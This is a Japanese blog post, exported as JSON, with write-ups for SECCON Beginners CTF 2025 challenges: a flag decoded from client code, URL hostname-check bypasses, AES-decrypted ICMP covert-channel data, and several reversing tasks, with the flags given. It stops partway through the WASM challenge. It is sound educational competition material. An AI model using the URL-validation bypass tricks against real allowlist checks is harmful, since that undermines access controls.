{"id":1203,"date":"2025-07-27T14:03:31","date_gmt":"2025-07-27T05:03:31","guid":{"rendered":"https:\/\/emeth.jp\/diary\/?p=1203"},"modified":"2025-07-27T14:03:32","modified_gmt":"2025-07-27T05:03:32","slug":"seccon-beginners-ctf-2025-writeup","status":"publish","type":"post","link":"https:\/\/emeth.jp\/diary\/2025\/07\/seccon-beginners-ctf-2025-writeup\/","title":{"rendered":"SECCON Beginners CTF 2025 writeup"},"content":{"rendered":"\n<p>\u89e3\u3044\u305f\u306e\u3060\u3051<\/p>\n\n\n\n<!--more-->\n\n\n\n<p>\u3074\u3063\u305f\u308a200\u4f4d\u3002pwn\u3067\u304d\u306a\u3044\u30de\u30f3\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-20.png\"><img loading=\"lazy\" decoding=\"async\" width=\"549\" height=\"450\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-20.png\" alt=\"\" class=\"wp-image-1227\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-20.png 549w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-20-300x246.png 300w\" sizes=\"auto, (max-width: 549px) 100vw, 549px\" \/><\/a><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading\">web<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">crypto<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">misc &#8211; kingyo_sukui<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>scooping! <a href=\"http:\/\/kingyo-sukui.challenges.beginners.seccon.jp:33333\" target=\"_blank\" rel=\"noreferrer noopener\">http:\/\/kingyo-sukui.challenges.beginners.seccon.jp:33333<\/a><\/p>\n<\/blockquote>\n\n\n\n<p>\u30b2\u30fc\u30e0\u306e\u65b9\u306b\u306f\u624b\u3092\u89e6\u308c\u305a\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u3092\u898b\u308b\u3068 <code>encryptedFlag<\/code> \u3068 <code>secretKey<\/code> \u304c\u3042\u308b\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-9.png\"><img loading=\"lazy\" decoding=\"async\" width=\"431\" height=\"87\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-9.png\" alt=\"\" class=\"wp-image-1214\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-9.png 431w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-9-300x61.png 300w\" sizes=\"auto, (max-width: 431px) 100vw, 431px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p><code>decryptFlag<\/code> \u95a2\u6570\u3067\u5fa9\u53f7\u3057\u3066\u3044\u308b\u306e\u3067\u540c\u3058\u51e6\u7406\u3092\u3057\u3066\u3084\u308c\u3070\u30d5\u30e9\u30b0\u3092\u5f97\u3089\u308c\u308b\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-10.png\"><img loading=\"lazy\" decoding=\"async\" width=\"531\" height=\"288\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-10.png\" alt=\"\" class=\"wp-image-1215\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-10.png 531w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-10-300x163.png 300w\" sizes=\"auto, (max-width: 531px) 100vw, 531px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>\u307f\u3093\u306a\u5927\u597d\u304dCyerChef\u3067\u89e3\u3044\u305f\u3002<code>secretKey<\/code> \u306e\u30c7\u30b3\u30fc\u30c9\u3068 <code>encryptedFlag<\/code> \u306e\u5fa9\u53f7\u306e2\u3064\u306b\u5206\u3051\u3066\u3084\u3063\u305f\u304c\u30011\u56de\u3067\u4e21\u65b9\u3068\u3082\u3084\u308b\u65b9\u6cd5\u306f\u3042\u308b\u306e\u3060\u308d\u3046\u304b\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-11.png\"><img loading=\"lazy\" decoding=\"async\" width=\"875\" height=\"408\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-11.png\" alt=\"\" class=\"wp-image-1216\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-11.png 875w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-11-300x140.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-11-768x358.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-11-624x291.png 624w\" sizes=\"auto, (max-width: 875px) 100vw, 875px\" \/><\/a><\/figure>\n<\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-12.png\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"353\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-12-1024x353.png\" alt=\"\" class=\"wp-image-1217\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-12-1024x353.png 1024w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-12-300x103.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-12-768x265.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-12-624x215.png 624w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-12.png 1212w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-code\"><code>Flag: ctf4b{n47uma7ur1}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">misc &#8211; url-checker<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u6709\u52b9\u306aURL\u3092\u4f5c\u308c\u307e\u3059\u304b\uff1f<\/p>\n\n\n\n<p><code>nc url-checker.challenges.beginners.seccon.jp 33457<\/code><\/p>\n<\/blockquote>\n\n\n\n<p>\u4e0e\u3048\u3089\u308c\u305f\u30b3\u30fc\u30c9\u3092\u898b\u308b\u3068\u3001\u30db\u30b9\u30c8\u540d\u304c\u8a31\u53ef\u3055\u308c\u305f\u3082\u306e\u3068\u4e00\u81f4\u3057\u306a\u3044\u5834\u5408\u306b <code>startswith<\/code> \u3067\u5224\u5b9a\u3057\u3001True\u306e\u5834\u5408\u306b\u30d5\u30e9\u30b0\u3092\u8fd4\u3057\u3066\u3044\u308b\u3002\u306a\u306e\u3067 <code>example.com.jp<\/code> \u306a\u3069\u3068\u3057\u3066\u3084\u308c\u3070\u901a\u308b\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-13.png\"><img loading=\"lazy\" decoding=\"async\" width=\"904\" height=\"281\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-13.png\" alt=\"\" class=\"wp-image-1218\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-13.png 904w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-13-300x93.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-13-768x239.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-13-624x194.png 624w\" sizes=\"auto, (max-width: 904px) 100vw, 904px\" \/><\/a><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>Flag: ctf4b{574r75w17h_50m371m35_n07_53cur37}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">misc &#8211; url-checker2<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u6709\u52b9\u306aURL\u3092\u4f5c\u308c\u307e\u3059\u304b\uff1f Part2<\/p>\n\n\n\n<p><code>nc url-checker2.challenges.beginners.seccon.jp 33458<\/code><\/p>\n<\/blockquote>\n\n\n\n<p><code>hostname<\/code> \u3092 <code>startswith<\/code> \u3067\u5224\u5b9a\u3057\u3066\u3044\u308b\u306e\u306f\u5909\u308f\u3089\u306a\u3044\u304c\u3001<code>netloc<\/code> \u3092 <code>:<\/code> \u3067\u533a\u5207\u3063\u305f\u6700\u521d\u306e\u90e8\u5206\u304c\u8a31\u53ef\u3055\u308c\u305f\u30db\u30b9\u30c8\u540d\u306b\u306a\u3063\u3066\u3044\u308b\u304b\u3069\u3046\u304b\u306e\u5224\u5b9a\u304c\u8ffd\u52a0\u3055\u308c\u3066\u3044\u308b\u3002<code>netloc<\/code> \u306f <code>:\/\/<\/code> \u304b\u3089 <code>\/<\/code> \u307e\u3067\u306e\u90e8\u5206\u306e\u3053\u3068\u3067\u3042\u308b\u3002<\/p>\n\n\n\n<p>\u4e00\u898b\u30dd\u30fc\u30c8\u756a\u53f7\u6307\u5b9a\u306b\u3082\u5bfe\u5fdc\u3057\u3066\u3044\u3066\u554f\u984c\u306a\u3044\u3088\u3046\u306b\u898b\u3048\u308b\u304c\u3001URL\u306b\u306f\u8a8d\u8a3c\u306e\u305f\u3081\u306b\u30e6\u30fc\u30b6\u540d\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u57cb\u3081\u8fbc\u3080\u3053\u3068\u304c\u3067\u304d\u3001\u305d\u306e\u500b\u6240\u306f <code>netloc<\/code> \u5185\u3067 <code>user:pass@host:port<\/code> \u306e\u5f62\u306b\u306a\u308b\u3002\u3068\u3044\u3046\u3053\u3068\u306f\u3053\u306e\u5f62\u5f0f\u306e\u5834\u5408\u306f <code>:<\/code> \u3067\u533a\u5207\u3063\u305f\u6700\u521d\u306e\u90e8\u5206\u304c <code>user<\/code> \u306b\u306a\u308b\u305f\u3081\u3001\u3053\u3053\u306b\u8a31\u53ef\u3055\u308c\u305f\u30db\u30b9\u30c8\u540d\u3092\u57cb\u3081\u8fbc\u3093\u3067\u3084\u308c\u3070\u3088\u3044\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-14.png\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"236\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-14.png\" alt=\"\" class=\"wp-image-1219\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-14.png 908w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-14-300x78.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-14-768x200.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-14-624x162.png 624w\" sizes=\"auto, (max-width: 908px) 100vw, 908px\" \/><\/a><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>Flag: ctf4b{cu570m_pr0c3551n6_0f_url5_15_d4n63r0u5}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">misc &#8211; Chamber of Echos<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u3069\u3046\u3084\u3089\u79c1\u305f\u3061\u306e\u30b5\u30fc\u30d0\u304c\u6a5f\u5bc6\u60c5\u5831\u3092\u9001\u4fe1\u3057\u3066\u3057\u307e\u3063\u3066\u3044\u308b\u3088\u3046\u3067\u3059\u3002 \u3088\u30fc\u304f\u8033\u3092\u6f84\u307e\u305b\u3066\u6b63\u3057\u3044\u65b9\u6cd5\u3067\u8a71\u3057\u304b\u3051\u308c\u3070\u3001\u5947\u5999\u306a\u6697\u53f7\u901a\u4fe1\u3092\u884c\u3063\u3066\u3044\u308b\u306e\u306b\u6c17\u3065\u304f\u306f\u305a\u3067\u3059\u3002 \u5e78\u3044\u3001\u6211\u3005\u306f\u4f7f\u7528\u3057\u3066\u3044\u308b\u6697\u53f7\u5316\u65b9\u5f0f\u3068\u6697\u53f7\u9375\u3092\u5165\u624b\u3057\u3066\u3044\u307e\u3059\u3002 \u53ce\u96c6\u30fb\u5fa9\u53f7\u3057\u3001\u6b63\u3057\u3044\u9806\u756a\u306b\u4e26\u3079\u3066\u30d5\u30e9\u30b0\u3092\u53d6\u5f97\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>\u6697\u53f7\u5316\u65b9\u5f0f: <code>AES-128-ECB<\/code><\/p>\n\n\n\n<p>\u5fa9\u53f7\u9375 (HEX): <code>546869734973415365637265744b6579<\/code><\/p>\n\n\n\n<p><code>chamber-of-echos.challenges.beginners.seccon.jp<\/code><\/p>\n<\/blockquote>\n\n\n\n<p>\u4e0e\u3048\u3089\u308c\u305f\u30b3\u30fc\u30c9\u3092\u898b\u308b\u3068\u3001\u30d5\u30e9\u30b0\u3092\u8907\u6570\u306b\u5206\u5272\u3057\u3066AES\u3067\u6697\u53f7\u5316\u3057\u3001ICMP\u306e\u30ec\u30b9\u30dd\u30f3\u30b9\u3067\u9001\u308a\u51fa\u3057\u3066\u3044\u308b\uff08\u5206\u5272\u3057\u305f\u3046\u3061\u306e\u3069\u308c\u3092\u9001\u308b\u304b\u306f\u30e9\u30f3\u30c0\u30e0\uff09\u3002\u4f55\u5206\u5272\u3055\u308c\u3066\u3044\u308b\u304b\u306f\u308f\u304b\u3089\u306a\u3044\u304c\u591a\u3081\u306b\u53d6\u308c\u3070\u5168\u30d1\u30bf\u30fc\u30f3\u3042\u308b\u3060\u308d\u3046\u3068\u3001Wireshark\u3067\u30ad\u30e3\u30d7\u30c1\u30e3\u3057\u3064\u3064ping\u3092\u9001\u4fe1\u3057\u3066\u307f\u308b\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-15.png\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"689\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-15-1024x689.png\" alt=\"\" class=\"wp-image-1220\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-15-1024x689.png 1024w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-15-300x202.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-15-768x517.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-15-624x420.png 624w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-15.png 1182w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>1\u3064\u306eEcho request\u306b\u5bfe\u3057\u3066reply\u304c2\u3064\u3042\u308b\u306e\u306f\u30db\u30b9\u30c8\u304c\u9001\u3063\u3066\u304f\u308b\u901a\u5e38\u306e\u30ea\u30d7\u30e9\u30a4\u3068\u3053\u306e\u30d7\u30ed\u30b0\u30e9\u30e0\u306b\u3088\u308b\u30ea\u30d7\u30e9\u30a4\u304c\u3042\u308b\u305f\u3081\u3002ICMP\u30c7\u30fc\u30bf\u304c <code>abcdefghijklmnopqrstuvwabcdefghi<\/code> \u306b\u306a\u3063\u3066<strong>\u3044\u306a\u3044<\/strong>\u3082\u306e\u304c\u3053\u306e\u30d7\u30ed\u30b0\u30e9\u30e0\u306b\u3088\u308b\u3082\u306e\u3002<\/p>\n\n\n\n<p>CyberChef\u3067\u5fa9\u53f7\uff06\u30d5\u30e9\u30b0\u5fa9\u5143\u30d7\u30ed\u30b0\u30e9\u30e0\u3092\u4f5c\u3063\u3066ICMP\u30c7\u30fc\u30bf\u3092\u767b\u9332\u3057\u3066\u3044\u304f\u3068\u30013\u3064\u3067\u30d5\u30e9\u30b0\u304c\u5b8c\u6210\u3057\u305f\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-16.png\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"816\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-16-1024x816.png\" alt=\"\" class=\"wp-image-1221\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-16-1024x816.png 1024w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-16-300x239.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-16-768x612.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-16-624x497.png 624w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-16.png 1232w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-code\"><code>Flag: ctf4b{th1s_1s_c0v3rt_ch4nn3l_4tt4ck}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">reversing &#8211; CrazyLazyProgram1<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u6539\u884c\u304c\u9762\u5012\u3060\u3063\u305f\u306e\u3067\u30ef\u30f3\u30e9\u30a4\u30ca\u30fc\u306b\u3057\u3066\u307f\u307e\u3057\u305f\u3002<\/p>\n<\/blockquote>\n\n\n\n<p>\u4e0e\u3048\u3089\u308c\u305f\u30b3\u30fc\u30c9\u3092\uff08\u624b\u52d5\u3067\uff09\u6574\u5f62\u3059\u308b\u3068\u3053\u3093\u306a\u611f\u3058\u306b\u3002<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: csharp; title: ; notranslate\" title=\"\">\nusing System;\nclass Program {\n    static void Main() {\n        int len=0x23;\n        Console.Write(&quot;INPUT &gt; &quot;);\n        string flag=Console.ReadLine();\n        if ((flag.Length) != len) {\n            Console.WriteLine(&quot;WRONG!&quot;);\n        } else {\n            if ( flag&#x5B;0]  == 0x63 &amp;&amp; flag&#x5B;1]  == 0x74 &amp;&amp; flag&#x5B;2]  == 0x66 &amp;&amp; flag&#x5B;3]  == 0x34 &amp;&amp;\n                 flag&#x5B;4]  == 0x62 &amp;&amp; flag&#x5B;5]  == 0x7b &amp;&amp; flag&#x5B;6]  == 0x31 &amp;&amp; flag&#x5B;7]  == 0x5f &amp;&amp;\n                 flag&#x5B;8]  == 0x31 &amp;&amp; flag&#x5B;9]  == 0x69 &amp;&amp; flag&#x5B;10] == 0x6e &amp;&amp; flag&#x5B;11] == 0x33 &amp;&amp;\n                 flag&#x5B;12] == 0x72 &amp;&amp; flag&#x5B;13] == 0x35 &amp;&amp; flag&#x5B;14] == 0x5f &amp;&amp; flag&#x5B;15] == 0x6d &amp;&amp;\n                 flag&#x5B;16] == 0x61 &amp;&amp; flag&#x5B;17] == 0x6b &amp;&amp; flag&#x5B;18] == 0x33 &amp;&amp; flag&#x5B;19] == 0x5f &amp;&amp;\n                 flag&#x5B;20] == 0x50 &amp;&amp; flag&#x5B;21] == 0x47 &amp;&amp; flag&#x5B;22] == 0x5f &amp;&amp; flag&#x5B;23] == 0x68 &amp;&amp;\n                 flag&#x5B;24] == 0x61 &amp;&amp; flag&#x5B;25] == 0x72 &amp;&amp; flag&#x5B;26] == 0x64 &amp;&amp; flag&#x5B;27] == 0x5f &amp;&amp;\n                 flag&#x5B;28] == 0x32 &amp;&amp; flag&#x5B;29] == 0x5f &amp;&amp; flag&#x5B;30] == 0x72 &amp;&amp; flag&#x5B;31] == 0x33 &amp;&amp;\n                 flag&#x5B;32] == 0x61 &amp;&amp; flag&#x5B;33] == 0x64 &amp;&amp; flag&#x5B;34] == 0x7d) {\n                Console.WriteLine(&quot;YES!!!\\nThis is Flag :)&quot;);\n            } else {\n                Console.WriteLine(&quot;WRONG!&quot;);\n            }\n        }\n    }\n}\n<\/pre><\/div>\n\n\n<p>\u6700\u5f8c\u306e<code> if <\/code>\u6587\u3067\u30d5\u30e9\u30b0\u30c1\u30a7\u30c3\u30af\u3057\u3066\u308b\u306e\u3067 <code>True<\/code> \u306b\u306a\u308b\u3088\u3046\u306b\u30d5\u30e9\u30b0\u3092\u7d44\u307f\u7acb\u3066\u3066\u3084\u308c\u3070OK<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG: ctf4b{1_1in3r5_mak3_PG_hard_2_r3ad}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">reversing &#8211; CrazyLazyProgram2<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u304c\u9762\u5012\u3060\u3063\u305f\u306e\u3067\u6a5f\u68b0\u8a9e\u3067\u4f5c\u3063\u3066\u307f\u307e\u3057\u305f<\/p>\n<\/blockquote>\n\n\n\n<p>\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u30d5\u30a1\u30a4\u30eb\u304c\u4e0e\u3048\u3089\u308c\u308b\u306e\u3067IDA\u306b\u98df\u308f\u305b\u3066\u307f\u308b\u3068\u4f55\u304b\u5206\u5c90\u306e\u591a\u3044\u69cb\u9020\u304c\u898b\u3048\u308b\u304c\u3001\u30d5\u30e9\u30b0\u6587\u5b57\u304b\u3069\u3046\u304b1\u6587\u5b57\u305a\u3064\u5224\u5b9a\u3057\u3066\u3044\u308b\u3060\u3051\u306a\u306e\u3067\u305d\u308c\u305e\u308c\u306e\u6587\u5b57\u3092\u629c\u304d\u51fa\u3057\u3066\u304f\u308c\u3070\u3088\u3044\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-2.png\"><img loading=\"lazy\" decoding=\"async\" width=\"749\" height=\"821\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-2.png\" alt=\"\" class=\"wp-image-1204\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-2.png 749w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-2-274x300.png 274w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-2-624x684.png 624w\" sizes=\"auto, (max-width: 749px) 100vw, 749px\" \/><\/a><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG: ctf4b{GOTO_G0T0_90t0_N0m0r3_90t0}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">reversing &#8211; D-Compile<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>C\u8a00\u8a9e\u306e\u6b21\u306f\u3053\u308c!<\/p>\n\n\n\n<p>This is the next trending programming language!<\/p>\n\n\n\n<p>\u203b\u4e00\u90e8\u74b0\u5883\u3067\u306f<code>libgphobos5<\/code>\u304c\u5fc5\u8981\u3068\u306a\u308a\u307e\u3059\u3002 \u307e\u305f\u5fc5\u8981\u306b\u5fdc\u3058\u3066<code>echo -n<\/code>\u3092\u3054\u5229\u7528\u304f\u3060\u3055\u3044\u3002<\/p>\n\n\n\n<p>Note:In some environments, <code>libgphobos5<\/code> is required. Also, use the <code>echo -n<\/code> command as necessary.<\/p>\n<\/blockquote>\n\n\n\n<p>IDA\u3067\u958b\u3044\u3066 <code>_Dmain<\/code> \u3092\u898b\u305f\u3089\u30d5\u30e9\u30b0\u3063\u307d\u3044\u3082\u306e\u304c\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-3.png\"><img loading=\"lazy\" decoding=\"async\" width=\"414\" height=\"1024\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-3-414x1024.png\" alt=\"\" class=\"wp-image-1205\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-3-414x1024.png 414w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-3-121x300.png 121w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-3.png 589w\" sizes=\"auto, (max-width: 414px) 100vw, 414px\" \/><\/a><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-code\"><code>FLAG: ctf4b{N3xt_Tr3nd_D_1an9uag3_101}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">reversing &#8211; wasm_S_exp<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u30d5\u30e9\u30b0\u3092\u30c1\u30a7\u30c3\u30af\u3057\u3066\u304f\u308c\u308b\u30d7\u30ed\u30b0\u30e9\u30e0<\/p>\n<\/blockquote>\n\n\n\n<p>WebAssembly\u306e\u30c6\u30ad\u30b9\u30c8\u304c\u4e0e\u3048\u3089\u308c\u308b\u3002\u30c6\u30ad\u30b9\u30c8\u5f62\u5f0f\u306eWebAssembly\u306b\u3064\u3044\u3066\u306f\u4ee5\u4e0b\u3092\u53c2\u7167\u3002<\/p>\n\n\n<div class=\"wp-block-su-blogcard\">\n\t<article class=\"wp-blogcard\" cite=\"https:\/\/developer.mozilla.org\/ja\/docs\/WebAssembly\/Guides\/Understanding_the_text_format\">\n\t\t<a\n\t\t\thref=\"https:\/\/developer.mozilla.org\/ja\/docs\/WebAssembly\/Guides\/Understanding_the_text_format\"\n\t\t\taria-label=\"\"\n\t\t\t\t\t\t\ttarget=\"_blank\"\n\t\t\t\t\t\t\t\t\t\trel=\"noopener noreferrer nofollow\"\n\t\t\t\t\t\tclass=\"wp-blogcard-item\"\n\t\t>\n\t\t\t\t\t\t<div class=\"wp-blogcard-content\">\n\t\t\t\t<div class=\"wp-blogcard-title\"><\/div>\n\t\t\t\t<div class=\"wp-blogcard-description\"><\/div>\n\t\t\t\t<div class=\"wp-blogcard-cite\">\n\t\t\t\t\t\t\t\t\t\t\t<img\n\t\t\t\t\t\t\tclass=\"wp-blogcard-favicon\"\n\t\t\t\t\t\t\tsrc=\"https:\/\/www.google.com\/s2\/favicons?domain=developer.mozilla.org&#038;sz=16\"\n\t\t\t\t\t\t\talt=\"\"\n\t\t\t\t\t\t\taria-hidden=\"true\"\n\t\t\t\t\t\t\/>\n\t\t\t\t\t\t\t\t\t\t<div class=\"wp-blogcard-domain\">developer.mozilla.org<\/div>\n\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t<\/a>\n\t<\/article>\n<\/div>\n\n\n\n<p><code>stir<\/code> \u95a2\u6570\u3067\u306f\u4ee5\u4e0b\u306e\u51e6\u7406\u3092\u3057\u3066\u3044\u308b<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u30d1\u30e9\u30e1\u30fc\u30bf\u3067\u4e0e\u3048\u3089\u308c\u305f\u5024\u3068 <code>0x5a5a<\/code> \u3092XOR\u3059\u308b<\/li>\n\n\n\n<li>37\u3092\u304b\u3051\u308b<\/li>\n\n\n\n<li>23\u3092\u8db3\u3059<\/li>\n\n\n\n<li>101\u3067\u5272\u3063\u305f\u4f59\u308a\u3092\u6c42\u3081\u308b<\/li>\n\n\n\n<li>1024\u3092\u8db3\u3059<\/li>\n<\/ol>\n\n\n\n<p><code>check_flag<\/code> \u95a2\u6570\u3067\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u51e6\u7406\u3092\u7e70\u308a\u8fd4\u3057\u3066\u3044\u308b\u3002\u6700\u521d\u306e\u30d6\u30ed\u30c3\u30af\u306e\u30c7\u30fc\u30bf\u3092\u4f7f\u3063\u3066\u8aac\u660e\u3002<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>38\u3092\u30d1\u30e9\u30e1\u30fc\u30bf\u306b <code>stir<\/code> \u95a2\u6570\u3092\u547c\u3073\u51fa\u3059<\/li>\n\n\n\n<li>\u8fd4\u308a\u5024\u3092\u756a\u5730\u3068\u3057\u3066\u30e1\u30e2\u30ea\u30a2\u30af\u30bb\u30b9\u3057\u30661\u30d0\u30a4\u30c8\u53d6\u5f97<\/li>\n\n\n\n<li><code>0x7b<\/code> \u3068\u7b49\u3057\u3044\u304b\u30c1\u30a7\u30c3\u30af<\/li>\n\n\n\n<li>\u7b49\u3057\u304f\u306a\u304b\u3063\u305f\u3089 <code>0<\/code> \u3092\u8fd4\u3059<\/li>\n\n\n\n<li>\u7b49\u3057\u3051\u308c\u3070\u6b21\u306b\u9032\u3080<\/li>\n<\/ol>\n\n\n\n<p>\u6700\u5f8c\u307e\u3067\u6765\u305f\u3089 <code>1<\/code> 